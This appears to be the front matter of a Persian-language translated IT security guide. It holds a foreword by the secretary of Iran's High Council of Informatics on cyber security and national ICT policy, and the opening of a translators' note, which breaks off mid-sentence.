‫ﺑﺎﻭﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻫﻤﺎﻧﮕﻮﻧﻪ ﮐﻪ ﭘﻴﺪﺍﻳﺶ ﺧﻂ ﻭ ﮐﺘﺎﺑﺖ ﺁﻧﭽﻨﺎﻥ ﺗﺄﺛﻴﺮ ﺷﮕﺮﻓﻲ ﺑﺮ ﺳﺮﻧﻮﺷﺖ ﺍﻧﺴﺎﻥ ﺑﺮﺟﺎﻱ ﮔﺬﺍﺷﺘﻪ ﮐﻪ ﻣـﻮﺭﺧﻴﻦ‬
‫ﺭﺍ ﺑﺮﺁﻥ ﺩﺍﺷﺘﻪ ﺗﺎ ﺩﺍﺳﺘﺎﻥ ﺯﻧﺪﮔﻲ ﺑﺸﺮ ﺑﺮ ﺍﻳﻦ ﮐﺮﻩ ﺧﺎﮐﻲ ﺭﺍ ﺑﻪ ﺩﻭﺭﺍﻥ ﻣﺎ ﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻭ ﺗـﺎﺭﻳﺦ ﺗﻘـﺴﻴﻢ ﻧﻤﺎﻳﻨـﺪ‪ ،‬ﻭﺭﻭﺩ ﺑـﻪ ﻓـﻀﺎﻱ ﻣﺠـﺎﺯﻱ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴﺰ ﺩﻭﺭﺓ ﺟﺪﻳﺪﻱ ﺍﺯ ﺗﻤﺪﻥ ﺑﺸﺮﻱ ﺭﺍ ﺭﻗﻢ ﺯﺩﻩ‪ ،‬ﺑﻨﺤﻮﻱ ﻛﻪ ﺍﻧﻘﻼﺏ ﻋﺼﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﻴﻮﺓ‬
‫ﺍﻧﺪﻳﺸﻪ‪ ،‬ﺗﻮﻟﻴﺪ‪ ،‬ﻣﺼﺮﻑ‪ ،‬ﺗﺠﺎﺭﺕ‪ ،‬ﻣﺪﻳﺮﻳﺖ‪ ،‬ﺍﺭﺗﺒﺎﻁ‪ ،‬ﺟﻨﮓ ﻭ ﺣﺘﻲ ﺩﻳﻨﺪﺍﺭﻱ ﻭ ﻋﺸﻖﻭﺭﺯﻱ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﺗﺤﻮﻝ ﺑﺰﺭﮒ ﺍﻟﺰﺍﻣﺎﺕ ﻭ ﺗﺒﻌﺎﺕ ﻓﺮﺍﻭﺍﻧﻲ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻣﻔﺎﻫﻴﻢ ﻧﻮﻳﻦ ﺍﻣﻨﻴـﺖ ﻣﺠـﺎﺯﻱ ﻳـﺎ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﺩﺭ ﺍﻃﻼﻕ ﻋﺒﺎﺭﺕ "ﺷﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﻛﻮﭼـﻚ ﻛـﺎﺭﮔﺮﻭﻫﻲ ﺑـﻪ ﺷـﺒﻜﻪﺍﻱ‬
‫ﮔﺴﺘﺮﺩﻩ ﻭ ﺟﻬﺎﻧﻲ )ﺍﻳﻨﺘﺮﻧﺖ( ﻭﺍﻗﻊ ﮔﺮﺩﻳﺪﻩ‪ ،‬ﻭ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺭﺷﺪ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﻌﺎﻣﻼﺕ ﻭ ﺗﺒـﺎﺩﻻﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺻـﻮﺭﺕ‬
‫ﻣﻲﭘﺬﻳﺮﺩ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﻧﻈﺎﻡﻫﺎﻱ ﺣﻔﺎﻇﺖ ﻭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺖ ﺿﻤﺎﻧﺖ ﻣﺒﺎﺩﻻﺕ ﻭ ﺍﻳﺠﺎﺩ ﺗﻌﻬﺪ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﻃﺮﻓﻬﺎﻱ ﺩﺧﻴﻞ ﺩﺭ ﻣﺒﺎﺩﻟـﻪ‬
‫ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ .‬ﻧﻈﺎﻡﻫﺎﻳﻲ ﻣﺸﺘﻤﻞ ﺑﺮ ﻗﻮﺍﻧﻴﻦ‪ ،‬ﺭﻭﺷﻬﺎ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻋﻘﻮﺩ ﻣﺘﺪﺍﻭﻝ ﻭ ﺭﻭﺷﻬﺎﻱ ﺳﻨﺘﻲ ﺗﻌﻬﺪﺁﻭﺭﺗﺮ‬
‫ﺑﻮﺩﻩ ﻭ ﺿﻤﻨﹰﺎ ﺍﻣﻨﻴﺖ ﻭ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺒﺎﺩﻟﻪﺷﺪﻩ ﺭﺍ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺗﻀﻤﻴﻦ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﻣﺠﺎﺯﻱ ﻫﻤﻮﺍﺭﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﻛـﺎﺭﺑﺮﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﻭ ﻓﺮﺍﮔﻴـﺮ ﺍﺯ‬
‫‪ ICT‬ﻣﻮﺭﺩ ﺗﺎﻛﻴﺪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﮔﺮﭼﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﻣﺤﻴﻂ ﻭﺍﻗﻌﻲ ﻭ ﭼﻪ ﺩﺭ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﺩﺳﺖﻧﻴـﺎﻓﺘﻨﻲ ﺍﺳـﺖ‪ ،‬ﻭﻟـﻲ ﺍﻳﺠـﺎﺩ‬
‫ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻭ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻧﻴﺎﺯﻫﺎ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﺎﺷﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄـﻲ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺍﺳﺖ‪ .‬ﺗﻨﻬﺎ ﺑﺎ ﻓﺮﺍﻫﻢ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺳﺖ ﻛﻪ ﺍﺷﺨﺎﺹ ﺣﻘﻴﻘﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﻭ ﺍﺭﮔﺎﻧﻬـﺎﻱ ﺩﻭﻟﺘـﻲ ﺿـﻤﻦ‬
‫ﻻ ﻫﻴﭽﮕـﺎﻩ ﻳﻜـﺪﻳﮕﺮ ﺭﺍ ﻧﺪﻳـﺪﻩ ﻭ‬
‫ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻪ ﻃﺮﻓﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﻳﻚ ﺗﺒﺎﺩﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺧﻴﻞ ﻫﺴﺘﻨﺪ ﻭ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻧﻤﻲﺷﻨﺎﺳﻨﺪ‪ ،‬ﻧﻘﺶ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﮔﺮﻩﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﺘﻌﺎﻣﻞ ﻭ ﻫﻢﺍﻓﺰﺍ ﺭﺍ ﺍﻳﻔﺎ ﺧﻮﺍﻫﻨﺪ ﻧﻤﻮﺩ‪.‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺳﺮﻣﺎﻳﻪ ﻫﺎﯼ ﺍﻃﻼﻋﺎﺗﯽ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻛﺸﻮﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﺍﺑﻌـﺎﺩ ﮔـﺴﺘﺮﺩﻩ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ‪ ،‬ﮐﻠﻴـﺪ ﻗﻔـﻞ‬
‫ﻓﺮﺻﺘﻬﺎﯼ ﺑﯽﺷﻤﺎﺭ ﺗﺠﺎﺭﯼ ﻭ ﻏﻴﺮﺗﺠﺎﺭﯼ ﺟﺪﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﯽ ﺍﺳﺖ‪ .‬ﺁﻧﭽﻪ ﻣﺴﻠﻢ ﺍﺳﺖ ﭼـﺎﻟﺶ ﺍﻣﻨﻴﺘـﯽ ﺭﻭﺩﺭﺭﻭﻱ ﻛـﺸﻮﺭ ﻋـﺪﻡ ﺩﺳﺘﺮﺳـﯽ ﺑـﻪ‬
‫ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﺎ ﻋﺪﻡ ﻭﺟﻮﺩ ﻣﺤﺼﻮﻻﺕ ﺍﻣﻨﻴﺘﯽ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﮑﻪ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ‪ ،‬ﻓﺮﻫﻨﮓﺳﺎﺯﻱ‪ ،‬ﺑﻬﺮﻩﻭﺭﻱ ﻣﻨﺎﺳﺐ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺟﻮﺩ ﻭ ﻧﻴﺰ ﺳﺎﺯﮔﺎﺭﯼ‬
‫ﺁﻧﻬﺎ ﺑﻪ ﮔﻮﻧﻪﺍﯼ ﺍﺳﺖ ﮐﻪ ﻧﻴﺎﺯ ﻣﻨﺤﺼﺮﺑﻪﻓﺮﺩ ﺷﺒﮑﻪ ﻭ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﺸﻮﺭ ﺭﺍ ﺗﺄﻣﻴﻦ ﮐﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺗﻮﺟﻪ ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺿـﺮﻭﺭﻱ‬
‫‪٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺖ ﻛﻪ ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺁﻳﻨﺪﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺟﺎﺭﻱ ﺩﺭ ﻣﻌﻤـﺎﺭﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﻣﻠـﻲ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺑﻪ ﺗﻨﺎﺳﺐ ﻭ ﻧﻴﺎﺯ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻧﻜﺘﺔ ﻣﻬﻢ ﺩﻳﮕﺮ ﺣﺎﺻﻞ ﺍﺯ ﺗﺠـﺎﺭﺏ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﭘﻴﺸﺮﻭ ﺣﺎﻛﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺄﻟﻪﺍﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺍﺳﺖ ﻭ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻫـﻢ‬
‫ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﻭ ﻫﻢ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺗﻌﻴﻴﻦ ﻧﻘﺸﻬﺎ‪ ،‬ﻭﻇﺎﻳﻒ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﻧﻜﺎﺕ ﻣﻬﻤﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ‬
‫ﻫﻤﻜﺎﺭﻳﻬﺎ ﺑﺎﻳﺪ ﺗﻌﺮﻳﻒ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭﺟﻪ ﺗﺎﺯﻩﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻫﺮ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ‪ .‬ﺍﻣﻴﺪ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺗﻮﺳﻌﻪ ﺳـﺮﻳﻊ‬
‫ﻛﺎﺭﺑﺮﻱﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻳﺮﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﻮﺷﺶ ﺑﺮﻧﺎﻣﺔ ﺗﻜﻔﺎ‪ ،‬ﺑﺎ ﺷﻨﺎﺧﺖ ﻭ ﺗﻌﻴﻴﻦ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﻛﻠﻴﺪﻱ ﻛﺸﻮﺭ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺣﻴﺎﺗﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﻧﺪ ﻭ ﺳﭙﺲ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ‪ ،‬ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳـﻦ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎ‪ ،‬ﻣﺴﻴﺮ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﺔ ﻛﺸﻮﺭ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺍﻧﺎﻳﻲﻣﺤﻮﺭ ﻫﻤﻮﺍﺭ ﮔﺮﺩﺩ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺩﺭ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻭ ﭘﺲ ﺍﺯ ﺗﺼﻮﻳﺐ ﺑﺮﻧﺎﻣﺔ ﺗﻮﺳﻌﺔ ﻭ ﻛﺎﺭﺑﺮﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ )ﺗﻜﻔﺎ( ﺩﺭ ﻫﻴـﺄﺕ ﺩﻭﻟـﺖ‬
‫ﻛﻪ ﻧﺸﺎﻥ ﺍﺯ ﺗﻮﺟﻪ ﻭ ﺑﻴﻨﺶ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﻛﺸﻮﺭ ﺩﺭ ﺭﻭﻳﻜﺮﺩ ﻧﻮﻳﻦ ﺑﻪ ﺗﻮﺳﻌﻪ ﻛﺸﻮﺭ ﺩﺍﺷـﺘﻪ‪ ،‬ﻣﻄﺎﻟﻌـﺎﺕ ﻭ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ ﺗﻤﻬﻴـﺪ‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻏﺎﺯ ﺷﺪﻩ ﻭ ﺭﺷﺪ ﺳﺮﻳﻌﻲ ﻳﺎﻓﺘﻪ ﺍﺳـﺖ‪ .‬ﻧﺘـﺎﻳﺞ ﻣﻄﺎﻟﻌـﺎﺕ ﻛـﺎﺭﮔﺮﻭﻩ ﻣـﺮﺗﺒﻂ‪ ،‬ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﺷﻨﺎﺧﺖ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻭﺳﻴﻌﺘﺮ ﻧﻴﺎﺯ ﮔﺮﺩﻳﺪ ﻭ ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﺑﺎ ﺗﺼﻮﻳﺐ ﻫﻴﺄﺕ ﻣﺤﺘﺮﻡ ﺩﻭﻟﺖ ﻭ ﺭﺋﻴﺲ ﻣﺤﺘﺮﻡ ﺟﻤﻬـﻮﺭ‪ ،‬ﺷـﻮﺭﺍﻱﻋـﺎﻟﻲ ﺍﻣﻨﻴـﺖ‬
‫ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﺸﻮﺭ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺖ ﻣﻌﺎﻭﻥ ﺍﻭﻝ ﻣﺤﺘﺮﻡ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺁﻏﺎﺯ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺍﻧﺸﺎﺍﷲ ﺑﺰﻭﺩﻱ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎ‬
‫ﻭ ﺗﺼﻤﻴﻤﺎﺕ ﺩﺭ ﻗﺎﻟﺐ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺳﻨﺪ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺸﻮﺭ ﺍﻋﻼﻡ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺩﺭ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺗﻼﺵ ﺩﺍﺭﺩ ﺗﺎ ﺑﺎ ﺗﻬﻴـﻪ‪ ،‬ﺗﺮﺟﻤـﻪ ﻭ ﺗـﺄﻟﻴﻒ ﻣﻄﺎﻟـﺐ ﻓﻨـﻲ ﺩﺭ ﻣﺤـﻴﻂ‬
‫ﻣﻨﺎﺳﺐ ﻧﺴﺒﺖ ﺑﻪ ﺗﻘﻮﻳﺖ ﺩﺍﻧﺶ ﻣﻮﺟﻮﺩ ﻛﺸﻮﺭ ﺩﺭ ﻗﻠﻤﺮﻭﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻗﺪﺍﻡ ﻧﻤﺎﻳﺪ‪ .‬ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﺟﻤﻠﻪ ﺍﺳﻨﺎﺩ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ‪ ،‬ﺟـﺎﻣﻊ‬
‫ﻭ ﻣﺘﺄﺧﺮ ﺩﺭ ﻗﻠﻤﺮﻭ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ‪ ICT‬ﻛﺸﻮﺭ ﻫﺪﻳﻪ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﻧﺼﺮﺍﷲ ﺟﻬﺎﻧﮕﺮﺩ‬
‫ﺩﺑﻴﺮ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ‬
‫ﻧﻤﺎﻳﻨﺪﻩ ﻭﻳﮋﻩ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ‬
‫ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺩﺭﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺻﺤﻴﺢ‪ ،‬ﻳﻜﻲ ﺍﺯ ﻧﻴﺎﺯﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﺍﻫـﺪﺍﻑ ﺳـﺎﺯﻣﺎﻧﻲ ﺍﺳـﺖ ﻭ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺍﺯ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺩﺭ ﮐـﺎﺭﺁﻳﻲ ﺁﻧﻬـﺎ ﻫـﺴﺘﻨﺪ‪ .‬ﻣﺰﺍﻳـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮐﺎﺭﺑﺮﺩ ﻭﺳﻴﻊ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻫﺪﺍﻑ ﺗﺠﺎﺭﻱ ﺭﺍ ﻧـﺎﮔﺰﻳﺮ ﮐـﺮﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺑـﻮﻳﮋﻩ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺗﻐﻴﻴﺮﺍﺕ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭ ﺭﻭﻧﺪ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﮐﻪ ﺣﺠﻢ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻳﻚ ﺳـﺮ‬
‫ﺍﻧﮕﺸﺖ ﺑﺎ ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؛ ﻭ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍ ﺍﺳﺖ ﮐﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﭘﻴﭽﻴـﺪﻩ ﺑـﺎ ﺍﻳـﻦ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭﺳـﻴﻊ‪ ،‬ﻣﺨـﺎﻃﺮﺍﺕ ﮔـﺴﺘﺮﺩﻩﺍﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﮐﻨﻨﺪ‪.‬‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﺍﻣﺮﻭﺯ‪ ،‬ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺎﻟﻲ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﺑﺼﻮﺭﺕ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺟﺎﺑﺠﺎ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺑﺎ ﺣﺴﺎﺳﻴﺘﻬﺎﻱ ﮐﻢ ﻭ ﺯﻳـﺎﺩ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﮑﻪﻫﺎ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺳﺎﻣﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻭ ﻣﺮﺗﺒﻂﺗﺮ ﺑـﺎ ﺩﻧﻴـﺎﻱ ﺑﻴﺮﻭﻧـﻲ ﻣـﻲﮔﺮﺩﻧـﺪ‪ ،‬ﻭ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﺎﺩﺓ ﻧﻔﻮﺫ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺎﺟﺮﺍﺟﻮﻳﺎﻥ ﻭ ﺟﻨﺎﻳﺘﮑﺎﺭﺍﻥ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻗﺮﺍﺭ‬
